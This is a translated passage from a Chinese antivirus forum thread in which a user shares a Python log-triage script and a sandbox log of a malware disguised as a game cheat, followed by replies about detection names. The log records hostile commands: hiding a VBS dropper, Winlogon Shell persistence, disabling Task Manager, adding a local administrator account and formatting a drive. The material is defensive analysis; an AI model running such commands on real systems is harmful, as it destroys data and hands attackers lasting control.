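        for name, rx, fld in COMPILED:
            val = ev.fields.get(fld)
            if val and rx.search(val):
                findings.append({"time": ev.time, "rule": name,
                                 "process": ev.fields.get("Process", ""),
                                 "detail": val})
    return findings


def summarize(findings) -> Counter:
    """Hit count per rule, handy for a one-line verdict on a sandbox run."""
    return Counter(f["rule"] for f in findings)


# Constructed input: six records copied from the posted log.
SAMPLE_LOG = r"""
2016-3-28 21:21:42    Create new process    Allowed
Process: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
Target: c:\windows\system32\cscript.exe
Command line: "cscript" "C:\Documents and Settings\zhou\Local Settings\Temp\1.tmp\svchost.vbs"
Rule: [Application]*

2016-3-28 21:21:52    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\attrib.exe
Command line: "C:\WINDOWS\system32\attrib.exe" +s +h +a +r c:\svchost.vbs
Rule: [Application]*

2016-3-28 21:22:20    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Value: 0x00000001(1)
Rule: [Registry group]System settings -> [Registry]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\*

2016-3-28 21:22:45    Modify registry value    Allowed
Process: c:\windows\system32\cscript.exe
Target: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
Value: c:\windows\system32\svchost.vbs
Rule: [Registry group]Autorun program locations -> [Registry]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; Shell

2016-3-28 21:23:20    Create new process    Allowed
Process: c:\windows\system32\cscript.exe
Target: c:\windows\system32\cmd.exe
Command line: "C:\WINDOWS\system32\cmd.exe" /c net localgroup administrators QQ962308082 /add
Rule: [Application]*

2016-3-28 21:24:07    Create new process    Allowed
Process: c:\windows\system32\cmd.exe
Target: c:\windows\system32\format.com
Command line: format d: /q /u /x /y
Rule: [Application]*
"""

if __name__ == "__main__":
    hits = triage(parse_log(SAMPLE_LOG))
    for f in hits:
        print(f"{f['time']}  {f['rule']:<28} {f['detail']}")
    print(summarize(hits))
```

The rules deliberately key on the Target and Command line fields rather than on file names, since svchost.vbs is chosen to look like the real service host; a Winlogon\Shell value pointing at a .vbs, or format.com spawned by cmd.exe spawned by cscript.exe, is what would have been worth blocking here.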

请叫我德玛西亚
Posted on 2016-3-28 22:02:02
These kids brought it on themselves, insisting on using some game cheat....
pal家族
Posted on 2016-3-28 22:04:04
My titanium-alloy dog eyes, aaaargh!
Kaspersky
Endpoint Security 10 for Windows
Access denied
The requested web page cannot be provided.

The requested object is located at

https://att.kafan.cn/forum.php?mod=att...


Infected with Worm.Win32.Ramnit.vlh
Message generated: 22:03:33

What the hell.....
windows7爱好者
Posted on 2016-3-28 22:08:52
FSP added it to the database
DG killed it successfully
学雷锋做人
Posted on 2016-3-28 22:10:38
Last edited by 学雷锋做人 on 2016-3-28 22:13
zhou0197
OP | Posted on 2016-3-28 22:11:56
pal家族 posted on 2016-3-28 22:04:
My titanium-alloy dog eyes, aaaargh!
Kaspersky
Endpoint Security 10 for Windows

My Kaspersky flags it too, but the VM test showed no obvious Ramnit infection behaviour............ could it have been partially disinfected earlier?
pal家族
Posted on 2016-3-28 22:18:49
zhou0197 posted on 2016-3-28 22:11:
My Kaspersky flags it too, but the VM test showed no obvious Ramnit infection behaviour............ could it have been partially disinfected earlier?

No no no no, Kaspersky has never reported Ramnit as "ramnit"; it reports it as Virus.Win32.Nimnul.
This one probably just has behaviour that looks a lot like some other variant.
zhou0197
OP | Posted on 2016-3-28 22:19:42
pal家族 posted on 2016-3-28 22:18:
No no no no, Kaspersky has never reported Ramnit as "ramnit"; it reports it as Virus.Win32.Nimnul.
This one probably just has behaviour that looks a lot like some other ...

Now I remember, that does seem to be the case............ slightly weird.
心醉咖啡
Posted on 2016-3-28 22:28:28
毒霸 (Kingsoft Duba) kills it
nick20010117
Posted on 2016-3-28 22:29:17

But what is this detection name, actually?
Mobile | Antivirus software | Software forum | 卡饭论坛 (KaFan forum)

Copyright © KaFan  KaFan.cn All Rights Reserved.
